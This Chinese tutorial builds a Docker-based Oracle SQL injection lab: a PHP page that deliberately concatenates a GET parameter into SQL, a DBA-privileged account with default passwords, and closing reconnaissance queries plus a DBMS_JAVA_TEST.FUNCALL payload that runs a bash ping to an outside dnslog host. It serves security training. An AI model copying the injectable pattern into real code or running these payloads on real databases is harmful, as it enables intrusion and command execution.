使用docker进行oracle数据库渗透测试,测试环境拓扑如下:
# Pull the Oracle XE 11g image that will serve as the injection target.
docker image pull registry.cn-hangzhou.aliyuncs.com/qida/oracle-xe-11g
# Start it detached as a container named "oracle", publishing the listener
# port 1521 on the host.
# NOTE(review): "1521:1521" binds on every host interface, so the lab's
# default sys/oracle login is reachable from the whole network; on a shared
# network prefer --publish 127.0.0.1:1521:1521 and re-check that the web
# container can still reach it.
docker container run --detach --publish 1521:1521 --name oracle registry.cn-hangzhou.aliyuncs.com/qida/oracle-xe-11g
# Open an interactive shell inside the running container.
docker container exec --interactive --tty oracle bash
root@bd849e50bab4:/# sqlplus /nolog
SQL> conn sys/oracle as sysdba
Connected.
SQL> select name from v$database;
NAME
---------
XE
#开辟空间建库
SQL> create tablespace pentest datafile '/tmp/pentest.dbf' size 100m;
Tablespace created.
#创建pentest用户,密码pentest;默认表空间(tablespace)是pentest
SQL> create user pentest identified by pentest default tablespace pentest;
User created.
#赋权pentest - connect,resource,dba
SQL> grant connect,resource,dba to pentest;
Grant succeeded.
SQL> exit
Disconnected from Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
#pentest用户连接
root@bd849e50bab4:/# sqlplus pentest/pentest
SQL*Plus: Release 11.2.0.2.0 Production on Fri Feb 19 06:38:04 2021
Copyright (c) 1982, 2011, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
#建表
SQL> CREATE TABLE users (id number,name varchar(500),surname varchar(1000));
Table created.
#导入数据
SQL> INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset');
INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny');
INSERT INTO users (id, name, surname) VALUES (3, 'wu', 'ming');
INSERT INTO users (id, name, surname) VALUES (4, 'sqlmap/1.0-dev (http://sqlmap.org)', 'user agent header');
INSERT INTO users (id, name, surname) VALUES (5, NULL, 'nameisnull');
commit;
1 row created.
SQL>
1 row created.
SQL>
1 row created.
SQL>
1 row created.
SQL>
1 row created.
SQL> commit;
Commit complete.
SQL> SELECT * FROM users where id=1;
ID
----------
NAME
--------------------------------------------------------------------------------
SURNAME
--------------------------------------------------------------------------------
1
luther
blisset
# Pull the Apache + PHP (OCI8) image that will host the lab page.
docker image pull thomasbisignani/docker-apache-php-oracle
cd ~/learn/docker
mkdir oracle_samplePages && cd oracle_samplePages
touch index.php
########
## Run options for docker-apache-php-oracle:
## 1. -v : the host folder /Users/bin4xin/learn/docker/oracle_samplePages is
##         bind-mounted at /var/www/html inside the container, i.e. that host
##         folder becomes the web root served by the container.
## 2. -p : container port 80 is published on host port 8090.
## 3. -d : run in the background.
########
docker container run --publish 8090:80 --detach --volume /Users/bin4xin/learn/docker/oracle_samplePages:/var/www/html thomasbisignani/docker-apache-php-oracle
cat index.php
<?php
// Connectivity smoke test for the lab. The credentials are the throw-away
// `pentest` account created in the SQL*Plus session above.
// NOTE(review): inside the web container 127.0.0.1 is the container itself,
// not the host where Oracle's port 1521 is published -- confirm this
// connect string resolves (Docker Desktop exposes the host as
// host.docker.internal).
$dbUser = 'pentest';
$dbPass = 'pentest';
$dbDsn  = '//127.0.0.1:1521/XE';

$conn = oci_connect($dbUser, $dbPass, $dbDsn);
if ($conn === false) {
    // oci_error() without an argument reports the last connection error.
    $err = oci_error();
    echo 'Oracle connect failed <br />';
    exit($err['message']);
}

echo 'Oracle connect ok' . "<br>";
?>
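<?php
// Lab page for the Oracle SQL injection target. The `id` query parameter is
// concatenated into the SQL on purpose (marked below); the rest of the page
// is written defensively so that this is the page's only weakness.
$username = 'pentest';
$password = 'pentest';
// NOTE(review): inside the web container 127.0.0.1 is the container itself,
// not the host where Oracle's port 1521 is published -- confirm this
// connect string resolves (Docker Desktop exposes the host as
// host.docker.internal).
$connectText = '//127.0.0.1:1521/XE';
$conn = oci_connect($username, $password, $connectText);
if (!$conn) {
    $e = oci_error();
    echo 'Oracle connect failed <br />';
    exit($e['message']);
}
echo 'Oracle connect ok' . "<br>";

// Prepare the statement
if (!isset($_GET['id']) || $_GET['id'] == null) {
    echo "oracle sqlinjection test: oracle_test.php?id=1</br>";
    $stid = oci_parse($conn, "select * from USERS");
} else {
    // SQL injection!!!!!! -- intentional: this line is the vulnerability the
    // lab exists to demonstrate. The fixed form binds the value instead of
    // concatenating it:
    //   $stid = oci_parse($conn, "SELECT * FROM users where id = :id");
    //   oci_bind_by_name($stid, ':id', $_GET['id']);
    $stid = oci_parse($conn, "SELECT * FROM users where id=" . $_GET['id']);
}
if (!$stid) {
    $e = oci_error($conn);
    exit($e['message']);
}

// Perform the logic of the query
$r = oci_execute($stid);
if (!$r) {
    // Echoing the raw ORA- message to the client is what makes error-based
    // techniques observable; a production page would log it and show a
    // generic error instead.
    $e = oci_error($stid);
    exit($e['message']);
}

// Fetch the results of the query
print "<table border='1'>\n";
while ($row = oci_fetch_array($stid, OCI_ASSOC+OCI_RETURN_NULLS)) {
    print "<tr>\n";
    foreach ($row as $item) {
        if ($item === null) {
            $cell = " ";
        } else {
            // NOTE(review): transcodes from GBK; the database character set
            // of the XE image is not shown on this page -- confirm, otherwise
            // non-ASCII values will be mangled.
            $cell = mb_convert_encoding($item, 'utf-8', 'gbk');
        }
        // Escape before emitting. Because the query above is injectable, the
        // fetched values are attacker-controlled; printing them raw would add
        // a reflected XSS on top of the intended SQL injection.
        print " <td>" . htmlspecialchars($cell, ENT_QUOTES, 'UTF-8') . "</td>\n";
    }
    print "</tr>\n";
}
print "</table>\n";
oci_free_statement($stid);
oci_close($conn);
?>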
至此,注入靶场搭建完毕。SQLMAP注入效果:
渗透常用语句:
# 当前用户权限
select * from session_roles
# 当前数据库版本
select banner from sys.v_$version where rownum=1
# 服务器出口IP
用utl_http.request 可以实现
# 服务器监听IP地址
select utl_inaddr.get_host_address from dual
# 服务器操作系统
select member from v$logfile where rownum=1
# 服务器sid查询,远程连接的话需要
select instance_name from v$instance;
# 当前连接用户
select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual
命令执行:
Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','ping ojuht0.dnslog.cn') from dual;
以上。